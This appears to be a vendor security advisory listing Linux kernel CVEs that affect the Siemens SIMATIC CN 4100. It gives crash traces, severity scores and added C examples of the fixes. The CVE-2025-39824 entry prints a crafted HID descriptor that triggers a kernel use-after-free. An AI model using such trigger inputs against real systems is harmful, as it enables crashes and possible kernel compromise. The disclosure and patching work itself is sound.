BUG: KMSAN: uninit-value in __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649
 __sctp_v6_cmp_addr+0x887/0x8c0 net/sctp/ipv6.c:649
 sctp_inet6_cmp_addr+0x4f2/0x510 net/sctp/ipv6.c:983
 sctp_bind_addr_conflict+0x22a/0x3b0 net/sctp/bind_addr.c:390
 sctp_get_port_local+0x21eb/0x2440 net/sctp/socket.c:8452
 sctp_get_port net/sctp/socket.c:8523 [inline]
 sctp_listen_start net/sctp/socket.c:8567 [inline]
 sctp_inet_listen+0x710/0xfd0 net/sctp/socket.c:8636
 __sys_listen_socket net/socket.c:1912 [inline]
 __sys_listen net/socket.c:1927 [inline]
 __do_sys_listen net/socket.c:1932 [inline]
 __se_sys_listen net/socket.c:1930 [inline]
 __x64_sys_listen+0x343/0x4c0 net/socket.c:1930
 x64_sys_call+0x271d/0x3e20 arch/x86/include/generated/asm/syscalls_64.h:51
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f

Local variable addr.i.i created at:
 sctp_get_port net/sctp/socket.c:8515 [inline]
 sctp_listen_start net/sctp/socket.c:8567 [inline]
 sctp_inet_listen+0x650/0xfd0 net/sctp/socket.c:8636
 __sys_listen_socket net/socket.c:1912 [inline]
 __sys_listen net/socket.c:1927 [inline]
 __do_sys_listen net/socket.c:1932 [inline]
 __se_sys_listen net/socket.c:1930 [inline]
 __x64_sys_listen+0x343/0x4c0 net/socket.c:1930

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39813
In the Linux kernel, the following vulnerability has been resolved:

ftrace: Fix potential warning in trace_printk_seq during ftrace_dump

When calling ftrace_dump_one() concurrently with reading trace_pipe, a WARN_ON_ONCE() in trace_printk_seq() can be triggered due to
a race condition. The issue occurs because:

CPU0 (ftrace_dump)                                CPU1 (reader)
echo z > /proc/sysrq-trigger
!trace_empty(&iter)
trace_iterator_reset(&iter) <- len = size = 0
                                                  cat /sys/kernel/tracing/trace_pipe
trace_find_next_entry_inc(&iter)
  __find_next_entry
    ring_buffer_empty_cpu <- all empty
  return NULL
trace_printk_seq(&iter.seq)
  WARN_ON_ONCE(s->seq.len >= s->seq.size)

In the context between trace_empty() and trace_find_next_entry_inc() during ftrace_dump, the ring buffer data was consumed by other readers. This caused trace_find_next_entry_inc to return NULL, failing to populate `iter.seq`. At this point, due to the prior trace_iterator_reset, both `iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal, the WARN_ON_ONCE condition is triggered.

Move the trace_printk_seq() into the if block that checks to make sure the return value of trace_find_next_entry_inc() is non-NULL in ftrace_dump_one(), ensuring the 'iter.seq' is properly populated before subsequent operations.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39817
In the Linux kernel, the following vulnerability has been resolved:

efivarfs: Fix slab-out-of-bounds in efivarfs_d_compare

Observed on kernel 6.6 (present on master as well):

BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0
Call trace:
 kasan_check_range+0xe8/0x190
 __asan_loadN+0x1c/0x28
 memcmp+0x98/0xd0
 efivarfs_d_compare+0x68/0xd8
 __d_lookup_rcu_op_compare+0x178/0x218
 __d_lookup_rcu+0x1f8/0x228
 d_alloc_parallel+0x150/0x648
 lookup_open.isra.0+0x5f0/0x8d0
 open_last_lookups+0x264/0x828
 path_openat+0x130/0x3f8
 do_filp_open+0x114/0x248
 do_sys_openat2+0x340/0x3c0
 __arm64_sys_openat+0x120/0x1a0

If dentry->d_name.len < EFI_VARIABLE_GUID_LEN, 'guid' can become negative, leading to oob.

The issue can be triggered by parallel lookups using invalid filename:

T1                                  T2
lookup_open
  ->lookup
    simple_lookup
      d_add
      // invalid dentry is added to hash list
                                    lookup_open
                                      d_alloc_parallel
                                        __d_lookup_rcu
                                          __d_lookup_rcu_op_compare
                                            hlist_bl_for_each_entry_rcu
                                            // invalid dentry can be retrieved
                                              ->d_compare
                                                efivarfs_d_compare
                                                // oob

Fix it by checking 'guid' before cmp.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39819
In the Linux kernel, the following vulnerability has been resolved:

fs/smb: Fix inconsistent refcnt update

A possible inconsistent update of refcount was identified in `smb2_compound_op`. Such inconsistent update could lead to possible resource leaks.

Why it is a possible bug:

1. In the comment section of the function, it clearly states that the reference to `cfile` should be dropped after calling this function.
2. Every control flow path would check and drop the reference to `cfile`, except the patched one.
3. Existing callers would not handle refcount update of `cfile` if -ENOMEM is returned.

To fix the bug, an extra goto label "out" is added, to make sure that the cleanup logic would always be respected. As the problem is caused by the allocation failure of `vars`, the cleanup logic between label "finished" and "out" can be safely ignored. According to the definition of function `is_replayable_error`, the error code of "-ENOMEM" is not recoverable. Therefore, the replay logic also gets ignored.
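The two length bugs above, mt_report_fixup() in CVE-2025-39806 and efivarfs_d_compare() in CVE-2025-39817, have the same shape: an offset derived from a fixed constant is used before the buffer is known to be long enough. The example below is added for this page and is not the kernel's code; the function names and the 36-character GUID length are assumptions chosen to mirror the two descriptions. It shows the fixed-offset form (reject descriptors shorter than 608 bytes) and the subtraction form, where a length smaller than the constant turns a signed offset negative unless it is rejected first:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <strings.h>

/* Fixed-offset patch in the style of the multitouch fixup: the byte at
 * offset 607 is rewritten from 0x15 to 0x25. The original read rdesc[607]
 * before checking rsize; a descriptor of 607 bytes or fewer puts that read
 * past the end of the allocation. */
#define MT_FIXUP_OFFSET 607

static bool mt_fixup_descriptor(uint8_t *rdesc, size_t rsize)
{
    if (rsize < MT_FIXUP_OFFSET + 1)   /* need at least 608 bytes */
        return false;
    if (rdesc[MT_FIXUP_OFFSET] != 0x15)
        return false;
    rdesc[MT_FIXUP_OFFSET] = 0x25;
    return true;
}

/* Name compare in the efivarfs style: "<name>-<GUID>", with the name
 * compared case-insensitively and the trailing 36-character GUID
 * case-sensitively. Returns 0 on match and 1 on mismatch (the dcache
 * d_compare convention). The bug was computing
 *     int guid = len - EFI_VARIABLE_GUID_LEN;
 * and using it as an offset: for len < 36 the offset is negative and the
 * compare reads before the start of the name. Rejecting such names up
 * front removes the negative offset entirely. */
#define EFI_VARIABLE_GUID_LEN 36

static int efivar_name_compare(const char *a, size_t a_len,
                               const char *b, size_t b_len)
{
    size_t guid;

    if (a_len != b_len)
        return 1;
    if (a_len < EFI_VARIABLE_GUID_LEN)   /* cannot carry a GUID: never a match */
        return 1;
    guid = a_len - EFI_VARIABLE_GUID_LEN; /* unsigned, and non-negative by construction */

    if (strncmp(a + guid, b + guid, EFI_VARIABLE_GUID_LEN) != 0)
        return 1;
    return strncasecmp(a, b, guid) != 0;
}
```

Keeping the offset unsigned and deriving it only after the length check means there is no value of the input for which the pointer arithmetic can go backwards, which is a stronger property than clamping a signed result afterwards.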
Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39823
In the Linux kernel, the following vulnerability has been resolved:

KVM: x86: use array_index_nospec with indices that come from guest

min and dest_id are guest-controlled indices. Using array_index_nospec() after the bounds checks clamps these values to mitigate speculative execution side-channels.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39824
In the Linux kernel, the following vulnerability has been resolved:

HID: asus: fix UAF via HID_CLAIMED_INPUT validation

After hid_hw_start() is called hidinput_connect() will eventually be called to set up the device with the input layer since the HID_CONNECT_DEFAULT connect mask is used. During hidinput_connect() all input and output reports are processed and corresponding hid_inputs are allocated and configured via hidinput_configure_usages(). This process involves slot tagging report fields and configuring usages by setting relevant bits in the capability bitmaps. However it is possible that the capability bitmaps are not set at all leading to the subsequent hidinput_has_been_populated() check to fail leading to the freeing of the hid_input and the underlying input device.
This becomes problematic because a malicious HID device like an ASUS ROG N-Key keyboard can trigger the above scenario via a specially crafted descriptor which then leads to a use-after-free when the name of the freed input device is written to later on after hid_hw_start().

Below, report 93 intentionally utilises the HID_UP_UNDEFINED Usage Page which is skipped during usage configuration, leading to the frees.

0x05, 0x0D, // Usage Page (Digitizer)
0x09, 0x05, // Usage (Touch Pad)
0xA1, 0x01, // Collection (Application)
0x85, 0x0D, // Report ID (13)
0x06, 0x00, 0xFF, // Usage Page (Vendor Defined 0xFF00)
0x09, 0xC5, // Usage (0xC5)
0x15, 0x00, // Logical Minimum (0)
0x26, 0xFF, 0x00, // Logical Maximum (255)
0x75, 0x08, // Report Size (8)
0x95, 0x04, // Report Count (4)
0xB1, 0x02, // Feature (Data,Var,Abs)
0x85, 0x5D, // Report ID (93)
0x06, 0x00, 0x00, // Usage Page (Undefined)
0x09, 0x01, // Usage (0x01)
0x15, 0x00, // Logical Minimum (0)
0x26, 0xFF, 0x00, // Logical Maximum (255)
0x75, 0x08, // Report Size (8)
0x95, 0x1B, // Report Count (27)
0x81, 0x02, // Input (Data,Var,Abs)
0xC0, // End Collection

Below is the KASAN splat after triggering the UAF:

[ 21.672709] ==================================================================
[ 21.673700] BUG: KASAN: slab-use-after-free in asus_probe+0xeeb/0xf80
[ 21.673700] Write of size 8 at addr ffff88810a0ac000 by task kworker/1:2/54
[ 21.673700]
[ 21.673700] CPU: 1 UID: 0 PID: 54 Comm: kworker/1:2 Not tainted 6.16.0-rc4-g9773391cf4dd-dirty #36 PREEMPT(voluntary)
[ 21.673700] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 21.673700] Call Trace:
[ 21.673700]
[ 21.673700] dump_stack_lvl+0x5f/0x80
[ 21.673700] print_report+0xd1/0x660
[ 21.673700] kasan_report+0xe5/0x120
[ 21.673700] __asan_report_store8_noabort+0x1b/0x30
[ 21.673700] asus_probe+0xeeb/0xf80
[ 21.673700] hid_device_probe+0x2ee/0x700
[ 21.673700] really_probe+0x1c6/0x6b0
[ 21.673700]
 __driver_probe_device+0x24f/0x310
[ 21.673700] driver_probe_device+0x4e/0x220
[...]
[ 21.673700]
[ 21.673700] Allocated by task 54:
[ 21.673700] kasan_save_stack+0x3d/0x60
[ 21.673700] kasan_save_track+0x18/0x40
[ 21.673700] kasan_save_alloc_info+0x3b/0x50
[ 21.673700] __kasan_kmalloc+0x9c/0xa0
[ 21.673700] __kmalloc_cache_noprof+0x139/0x340
[ 21.673700] input_allocate_device+0x44/0x370
[ 21.673700] hidinput_connect+0xcb6/0x2630
[ 21.673700] hid_connect+0xf74/0x1d60
[ 21.673700] hid_hw_start+0x8c/0x110
[ 21.673700] asus_probe+0x5a3/0xf80
[ 21.673700] hid_device_probe+0x2ee/0x700
[ 21.673700] really_probe+0x1c6/0x6b0
[ 21.673700] __driver_probe_device+0x24f/0x310
[ 21.673700] driver_probe_device+0x4e/0x220
[...]
[ 21.673700]
[ 21.673700] Freed by task 54:
[ 21.673700] kasan_save_stack+0x3d/0x60
[ 21.673700] kasan_save_track+0x18/0x40
[ 21.673700] kasan_save_free_info+0x3f/0x60
[ 21.673700] __kasan_slab_free+0x3c/0x50
[ 21.673700] kfre
---truncated---

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39825
In the Linux kernel, the following vulnerability has been resolved:

smb: client: fix race with concurrent opens in rename(2)

Besides sending the rename request to the server, the rename process also involves closing any deferred close, waiting for outstanding I/O to complete as well as marking all existing open handles as deleted to prevent them from deferring closes, which increases the race window for potential concurrent opens on the target file.

Fix this by unhashing the dentry in advance to prevent any concurrent opens on the target.
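For the KVM entry above (CVE-2025-39823), the mitigation is array_index_nospec(): after the architectural bounds check, the index is ANDed with a branch-free mask so that a mispredicted path cannot use an out-of-range value to index the array. The example below is written for this page and is not kernel code; it reimplements the generic mask construction in userspace C (the empty asm statement stands in for OPTIMIZER_HIDE_VAR) and applies it to an assumed vCPU table indexed by a guest-supplied dest_id. The table contents and the lookup function are illustrative:

```c
#include <limits.h>
#include <stdint.h>

#define BITS_PER_LONG (sizeof(unsigned long) * CHAR_BIT)

/* Same construction as the generic kernel helper: all ones when
 * index < size, zero otherwise, computed without a branch so that the
 * clamp also holds on a speculatively executed path where the bounds
 * check was mispredicted. For index < size the OR has its top bit clear,
 * so the complement is negative and the arithmetic shift yields -1;
 * for index >= size, (size - 1 - index) wraps and sets the top bit. */
static inline unsigned long index_mask_nospec(unsigned long index, unsigned long size)
{
    __asm__ volatile("" : "+r"(index)); /* keep the compiler from folding the mask away */
    return ~(long)(index | (size - 1UL - index)) >> (BITS_PER_LONG - 1);
}

#define ARRAY_INDEX_NOSPEC(index, size) \
    ((index) & index_mask_nospec((unsigned long)(index), (unsigned long)(size)))

/* Illustrative table indexed by a guest-controlled value. */
#define NR_VCPUS 4
static const unsigned int vcpu_apic_id[NR_VCPUS] = { 0x10, 0x11, 0x12, 0x13 };

/* Bounds check (architectural) followed by the speculative clamp.
 * Returns -1 for out-of-range dest_id. */
static int lookup_apic_id(unsigned long dest_id)
{
    if (dest_id >= NR_VCPUS)
        return -1;
    dest_id = ARRAY_INDEX_NOSPEC(dest_id, NR_VCPUS);
    return (int)vcpu_apic_id[dest_id];
}
```

The clamp is only meaningful after a real bounds check: on the architectural path it is a no-op for valid indices, and for an out-of-range value it collapses the index to zero rather than rejecting it, so it must never replace the check that returns an error.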
Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39826
In the Linux kernel, the following vulnerability has been resolved:

net: rose: convert 'use' field to refcount_t

The 'use' field in struct rose_neigh is used as a reference counter but lacks atomicity. This can lead to race conditions where a rose_neigh structure is freed while still being referenced by other code paths.

For example, when rose_neigh->use becomes zero during an ioctl operation via rose_rt_ioctl(), the structure may be removed while its timer is still active, potentially causing use-after-free issues.

This patch changes the type of 'use' from unsigned short to refcount_t and updates all code paths to use rose_neigh_hold() and rose_neigh_put() which operate reference counts atomically.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39827
In the Linux kernel, the following vulnerability has been resolved:

net: rose: include node references in rose_neigh refcount

Current implementation maintains two separate reference counting mechanisms: the 'count' field in struct rose_neigh tracks references from rose_node structures, while the 'use' field (now refcount_t) tracks references from rose_sock.
This patch merges these two reference counting systems using 'use' field for proper reference management. Specifically, this patch adds incrementing and decrementing of rose_neigh->use when rose_neigh->count is incremented or decremented.

This patch also modifies rose_rt_free(), rose_rt_device_down() and rose_clear_route() to properly release references to rose_neigh objects before freeing a rose_node through rose_remove_node().

These changes ensure rose_neigh structures are properly freed only when all references, including those from rose_node structures, are released. As a result, this resolves a slab-use-after-free issue reported by Syzbot.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39828
In the Linux kernel, the following vulnerability has been resolved:

atm: atmtcp: Prevent arbitrary write in atmtcp_recv_control().

syzbot reported the splat below. [0]

When atmtcp_v_open() or atmtcp_v_close() is called via connect() or close(), atmtcp_send_control() is called to send an in-kernel special message.

The message has ATMTCP_HDR_MAGIC in atmtcp_control.hdr.length. Also, a pointer of struct atm_vcc is set to atmtcp_control.vcc.

The notable thing is struct atmtcp_control is uAPI but has a space for an in-kernel pointer.

struct atmtcp_control {
	struct atmtcp_hdr hdr;	/* must be first */
	...
	atm_kptr_t vcc;		/* both directions */
	...
} __ATM_API_ALIGN;

typedef struct { unsigned char _[8]; } __ATM_API_ALIGN atm_kptr_t;

The special message is processed in atmtcp_recv_control() called from atmtcp_c_send().

atmtcp_c_send() is vcc->dev->ops->send() and called from 2 paths:

1.
.ndo_start_xmit() (vcc->send() == atm_send_aal0())
2. vcc_sendmsg()

The problem is sendmsg() does not validate the message length and userspace can abuse atmtcp_recv_control() to overwrite any kptr by atmtcp_control.

Let's add a new ->pre_send() hook to validate messages from sendmsg().

[0]:
Oops: general protection fault, probably for non-canonical address 0xdffffc00200000ab: 0000 [#1] SMP KASAN PTI
KASAN: probably user-memory-access in range [0x0000000100000558-0x000000010000055f]
CPU: 0 UID: 0 PID: 5865 Comm: syz-executor331 Not tainted 6.17.0-rc1-syzkaller-00215-gbab3ce404553 #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025
RIP: 0010:atmtcp_recv_control drivers/atm/atmtcp.c:93 [inline]
RIP: 0010:atmtcp_c_send+0x1da/0x950 drivers/atm/atmtcp.c:297
Code: 4d 8d 75 1a 4c 89 f0 48 c1 e8 03 42 0f b6 04 20 84 c0 0f 85 15 06 00 00 41 0f b7 1e 4d 8d b7 60 05 00 00 4c 89 f0 48 c1 e8 03 <42> 0f b6 04 20 84 c0 0f 85 13 06 00 00 66 41 89 1e 4d 8d 75 1c 4c
RSP: 0018:ffffc90003f5f810 EFLAGS: 00010203
RAX: 00000000200000ab RBX: 0000000000000000 RCX: 0000000000000000
RDX: ffff88802a510000 RSI: 00000000ffffffff RDI: ffff888030a6068c
RBP: ffff88802699fb40 R08: ffff888030a606eb R09: 1ffff1100614c0dd
R10: dffffc0000000000 R11: ffffffff8718fc40 R12: dffffc0000000000
R13: ffff888030a60680 R14: 000000010000055f R15: 00000000ffffffff
FS:  00007f8d7e9236c0(0000) GS:ffff888125c1c000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000000045ad50 CR3: 0000000075bde000 CR4: 00000000003526f0
Call Trace:
 vcc_sendmsg+0xa10/0xc60 net/atm/common.c:645
 sock_sendmsg_nosec net/socket.c:714 [inline]
 __sock_sendmsg+0x219/0x270 net/socket.c:729
 ____sys_sendmsg+0x505/0x830 net/socket.c:2614
 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668
 __sys_sendmsg net/socket.c:2700 [inline]
 __do_sys_sendmsg net/socket.c:2705 [inline]
 __se_sys_sendmsg net/socket.c:2703 [inline]
 __x64_sys_sendmsg+0x19b/0x260 net/socket.c:2703
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f8d7e96a4a9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 51 18 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f8d7e923198 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007f8d7e9f4308 RCX: 00007f8d7e96a4a9
RDX: 0000000000000000 RSI: 0000200000000240 RDI: 0000000000000005
RBP: 00007f8d7e9f4300 R08: 65732f636f72702f R09: 65732f636f72702f
R10: 65732f636f72702f R11: 0000000000000246 R12: 00007f8d7e9c10ac
R13: 00007f8d7e9231a0 R14: 0000200000000200 R15: 0000200000000250
Modules linked in:

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39835
In the Linux kernel, the following vulnerability has been resolved:

xfs: do not propagate ENODATA disk errors into xattr code

ENODATA (aka ENOATTR) has a very specific meaning in the xfs xattr code; namely, that the requested attribute name could not be found.

However, a medium error from disk may also return ENODATA. At best, this medium error may escape to userspace as "attribute not found" when in fact it's an IO (disk) error.

At worst, we may oops in xfs_attr_leaf_get() when we do:

	error = xfs_attr_leaf_hasname(args, &bp);

	if (error == -ENOATTR) {
		xfs_trans_brelse(args->trans, bp);
		return error;
	}

because an ENODATA/ENOATTR error from disk leaves us with a null bp, and the xfs_trans_brelse will then null-deref it.
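The atmtcp entry above (CVE-2025-39828) is a case where a uAPI structure doubles as an in-kernel message carrying a kernel pointer, and the sendmsg() path handed user-supplied bytes to the same parser that handles the kernel's own control messages. The check below is an added example for this page, not the kernel's pre_send hook: the header layout and the ATMTCP_HDR_MAGIC value are assumed to match include/uapi/linux/atm_tcp.h and should be verified against the tree, and the declared-length comparison is an extra precaution of my own rather than something the entry describes. The point is the gate: anything arriving from userspace that claims to be a control message is refused before it can reach the control parser:

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Header layout and magic assumed to match the uAPI definition: a length
 * field of all ones marks a control message, which only the kernel itself
 * generates (from connect()/close()). */
struct atmtcp_hdr {
    uint16_t vpi;
    uint16_t vci;
    uint32_t length;
};
#define ATMTCP_HDR_MAGIC (~0U)

/* Validate bytes that arrived via sendmsg() before the send path parses them.
 * Returns 0 if the message may proceed as a data cell, -EINVAL otherwise. */
static int atmtcp_pre_send_check(const uint8_t *data, size_t len)
{
    struct atmtcp_hdr hdr;

    if (len < sizeof(hdr))
        return -EINVAL;                  /* header itself is truncated */
    memcpy(&hdr, data, sizeof(hdr));

    /* Control messages carry an atm_kptr_t that atmtcp_recv_control() writes
     * through. A message from userspace must never be allowed to look like
     * one, regardless of how long it is. */
    if (hdr.length == ATMTCP_HDR_MAGIC)
        return -EINVAL;

    /* Added here as a general precaution (not described in the entry): the
     * declared cell length must fit in the bytes that were actually sent. */
    if (hdr.length > len - sizeof(hdr))
        return -EINVAL;
    return 0;
}

/* Constructed test message: header followed by payload_len bytes of 0xAA.
 * Returns the total length written to out (capacity must be at least
 * sizeof(struct atmtcp_hdr) + payload_len). */
static size_t build_msg(uint8_t *out, uint32_t declared_len, size_t payload_len)
{
    struct atmtcp_hdr hdr = { .vpi = 0, .vci = 32, .length = declared_len };

    memcpy(out, &hdr, sizeof(hdr));
    memset(out + sizeof(hdr), 0xAA, payload_len);
    return sizeof(hdr) + payload_len;
}
```

The header is copied out with memcpy rather than cast in place so that the check does not depend on the alignment of the caller's buffer; the kernel's skb data has the same concern.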
As discussed on the list, we really need to modify the lower level IO functions to trap all disk errors and ensure that we don't let unique errors like this leak up into higher xfs functions - many like this should be remapped to EIO.

However, this patch directly addresses a reported bug in the xattr code, and should be safe to backport to stable kernels. A larger-scope patch to handle more unique errors at lower levels can follow later.

(Note, prior to 07120f1abdff we did not oops, but we did return the wrong error code to userspace.)

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39838
In the Linux kernel, the following vulnerability has been resolved:

cifs: prevent NULL pointer dereference in UTF16 conversion

There can be a NULL pointer dereference bug here. NULL is passed to __cifs_sfu_make_node without checks, which passes it unchecked to cifs_strndup_to_utf16, which in turn passes it to cifs_local_to_utf16_bytes where '*from' is dereferenced, causing a crash.

This patch adds a check for NULL 'src' in cifs_strndup_to_utf16 and returns NULL early to prevent dereferencing NULL pointer.
Found by Linux Verification Center (linuxtesting.org) with SVACE

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39839
In the Linux kernel, the following vulnerability has been resolved:

batman-adv: fix OOB read/write in network-coding decode

batadv_nc_skb_decode_packet() trusts coded_len and checks only against skb->len. XOR starts at sizeof(struct batadv_unicast_packet), reducing payload headroom, and the source skb length is not verified, allowing an out-of-bounds read and a small out-of-bounds write.

Validate that coded_len fits within the payload area of both destination and source sk_buffs before XORing.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 5.5 MEDIUM (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CVE-2025-39841
In the Linux kernel, the following vulnerability has been resolved:

scsi: lpfc: Fix buffer free/clear order in deferred receive path

Fix a use-after-free window by correcting the buffer release sequence in the deferred receive path. The code freed the RQ buffer first and only then cleared the context pointer under the lock. Concurrent paths (e.g., ABTS and the repost path) also inspect and release the same pointer under the lock, so the old order could lead to double-free/UAF.
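For the network-coding entry above (CVE-2025-39839), the decode XORs the coded bytes of the received packet against a buffered source packet, and the attacker-controlled coded_len has to fit inside the payload area of both packets after their unicast headers, not just inside the total length of one of them. The example below is added for this page and is not batman-adv code: the 10-byte header size, the packet struct and the function names are assumptions standing in for the kernel's sk_buff handling. The same XOR serves as the sender-side encode, so the round trip can be checked on constructed packets:

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed size of the unicast header that precedes the coded bytes. */
#define UNICAST_HDR_LEN 10

struct pkt {
    uint8_t *data;
    size_t len;
};

/* XOR in place: dst payload ^= src payload, over coded_len bytes starting
 * after each packet's unicast header. coded_len comes from the wire.
 * Applying it once to a ^ b with b recovers a, so the same routine is
 * the decode and the encode. */
static int nc_xor_payload(struct pkt *dst, const struct pkt *src, size_t coded_len)
{
    /* The original check was coded_len <= dst->len: it ignored the header
     * offset, so a coded_len close to dst->len read and wrote up to
     * UNICAST_HDR_LEN bytes past the end, and src->len was never examined. */
    if (dst->len < UNICAST_HDR_LEN || src->len < UNICAST_HDR_LEN)
        return -EINVAL;
    if (coded_len > dst->len - UNICAST_HDR_LEN ||
        coded_len > src->len - UNICAST_HDR_LEN)
        return -EINVAL;

    for (size_t i = 0; i < coded_len; i++)
        dst->data[UNICAST_HDR_LEN + i] ^= src->data[UNICAST_HDR_LEN + i];
    return 0;
}

/* Round trip on constructed packets; returns 1 if payload a is recovered
 * after encoding against b and decoding against b again. */
static int nc_roundtrip_ok(void)
{
    uint8_t a_buf[UNICAST_HDR_LEN + 6] = { 0 };
    uint8_t b_buf[UNICAST_HDR_LEN + 6] = { 0 };
    const uint8_t a_payload[6] = { 1, 2, 3, 4, 5, 6 };
    const uint8_t b_payload[6] = { 9, 9, 9, 9, 9, 9 };
    struct pkt a = { a_buf, sizeof a_buf };
    struct pkt b = { b_buf, sizeof b_buf };

    for (size_t i = 0; i < 6; i++) {
        a_buf[UNICAST_HDR_LEN + i] = a_payload[i];
        b_buf[UNICAST_HDR_LEN + i] = b_payload[i];
    }
    if (nc_xor_payload(&a, &b, 6) != 0)   /* a now holds a ^ b */
        return 0;
    if (nc_xor_payload(&a, &b, 6) != 0)   /* back to a */
        return 0;
    for (size_t i = 0; i < 6; i++)
        if (a_buf[UNICAST_HDR_LEN + i] != a_payload[i])
            return 0;
    return 1;
}
```

Both subtractions are guarded by the preceding header-length check, so neither can wrap; checking `coded_len + UNICAST_HDR_LEN <= len` instead would reintroduce an overflow for very large coded_len values.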
Note that the repost path already uses the correct pattern: detach the pointer under the lock, then free it after dropping the lock. The deferred path should do the same.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected). Remediation: vendor fix, update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-39842
